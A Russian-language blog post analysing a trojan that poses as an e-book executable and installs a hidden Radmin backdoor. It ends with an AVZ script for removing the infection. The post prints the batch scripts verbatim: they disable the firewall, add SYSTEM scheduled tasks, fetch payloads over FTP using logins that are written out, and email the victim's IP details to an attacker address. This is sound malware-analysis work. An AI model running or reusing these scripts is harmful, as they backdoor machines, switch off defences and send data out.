08.07.2011

Вирусы (и антивирусы) / Анализ очередного варианта скрытого радмина

Из этой статьи можно почерпнуть некоторые знания по написанию батников.


Вирусы (и антивирусы) / Анализ очередного варианта скрытого радмина: "Сегодня на форуме в личку прошло сообщение с просьбой проверить файл. Я согласился, любопытно же. Немного опережу события и скажу, что это бэкдор созданный из радмина второй ветки и кое-что еще)

Полученный файл: kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)

Хэш суммы я буду указывать только для вредоносных файлов.

В общем по описанию — это какая-то книга, почему в exe — непонятно, глядим далее.

Воспользуемся PEiD:



UPX 0.89.6 — 1.02 / 1.05 — 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]



Попробуем распаковать винраром, получим два файла:


filip_olegovich.exe
и setup.exe (md5:C888FCE716D600EE53D467F7DF2B2475)



Оба упакованы в upx, после распаковки получим следующую картину:



filip_olegovich.exe — собранный в exe pdf-файл, он нас более не интересует.
setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) — компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.

Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованногоsetup.exe:



Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:

sc config schedule start= auto
sc start schedule


sc config wscsvc start= disabled
sc config SharedAccess start= disabled


sc stop wscsvc
sc stop SharedAccess


schtasks /create /tn «f» /sc minute /mo 1 /ru «NT AUTHORITY\SYSTEM» /tr %systemroot%/ff.bat


attrib +h %systemroot%/tasks/*.* netsh advfirewall set currentprofile state off
C:/isendsms_setup.exe

Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл. Разработчик или параноик или диллетант, скорее — второе. Проще говоря, этот файл setup.exe — экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровезированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin
u11631
javasc
get f.bat
del check.txt
bye

А такой код в %systemroot%/ff.bat
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc stop wscsvc sc stop SharedAccess
ftp -s:C:\WINDOWS/system.bin ftp.on.ufanet.ru f.bat

%systemroot% — папка windows, в моем случае C:\windows

О чем это может нам сказать?
Прежде всего, файл system.bin — конфиг для фтп-клиента, который зайдет на сервер и скачает определенный файл. (Строки по очереди: логин от сервера, пароль, скачивание файла с сервера, удаление файла на сервере, завершение ftp-сессии)
Что делает файл ff.bat? Во первых останавливает и убирает из автозагрузки две службы: wscsvc — центр обеспечения безопасности и оповещения системы безопасности
SharedAccess — брэндмауэр windows Это не позволяет встроенному фаерволлу заблокировать дальнейшую сетевую активность, а так же блокирует оповещения о брешах в безопасности системы.
Далее поднимает подключение к фтп серверу ftp.on.ufanet.ru с настойками из файла system.bin. После завершения сессии фтп — выполнит файл f.ftp, который скачает с указанного сервера.
Наши файлы setup.exe, кстати, уже проанализировались на virustotal:

Дальше нам нужно получить файлы, которые должны были скачаться с фтп, для этого возьмем логин и пароль и подключимся самостоятельно:
f.bat
system.exe (md5:1ADEF54E08294BC7548C91C8F6CF2032) — RAR SFX архив с таким вот комментарием:
path=%SYSTEMROOT%/help/win32 silent=1 overwrite=1 setup=install.bat

Этот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32



После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии: raddrv.dll и AdmDll.dll — драйвера Radmin 2

svchost.exe — исполняемый файл Radmin 2

Blat.* — файлы, пренадлежащие консольному почтовому клиенту blat

А вот эти файлы рассмотрим поподробней: install.bat
@echo off

sc config wscsvc start= disabled
sc stop wscsvc

sc config SharedAccess start= disabled
sc stop SharedAccess

sc config schedule start= auto
sc start schedule
svchost.exe /install /silence
svchost.exe /pass:12345678125 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d «Service Host Controller» /f
svchost.exe /stop
svchost.exe /start
blat.exe -install -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptsc
schtasks /create /tn «security» /sc minute /mo 15 /ru «NT AUTHORITY\SYSTEM» /tr %SYSTEMROOT%/help/win32/microsoft.bat
attrib +h %systemroot%/tasks/*.*
exit

Разберем комманды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее — самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина — Service Host Controller

Ну и окончание — запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat
sc config SharedAccess start= disabled
sc stop SharedAccess
ipconfig /all>%SYSTEMROOT%\Help\win32/ip.txt
%SYSTEMROOT%/help/win32/blat.exe %systemroot%/help/win32/ip.txt -to ufanetcom2@yandex.ru. exit

Второй батник уже в который раз отключает системный фаерволл, а так же выполняет команду ipconfig /all с сохранением вывода в текстовый файл, который в дальнейшем отправится с помощью blat по адресу ufanetcom2@yandex.ru, короче говоря — отправит ip-адрес для подключения злоумышленника к инфицированной машине.

На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.
begin SearchRootkit(true, true); SetAVZGuardStatus(True); StopService('r_server'); DeleteService('r_server', true ); TerminateProcessByName('c:\windows\help\win32\svchost.exe'); DeleteFile('C:\WINDOWS\ff.bat'); DeleteFile('C:\WINDOWS\SYSTEM.DLL'); DeleteFileMask('C:\WINDOWS\help\win32', '*.*', true); BC_ImportAll; ExecuteSysClean; ExecuteWizard('TSW',2,3,true); BC_Activate; RebootWindows(true); end.

Комментариев нет:

Отправить комментарий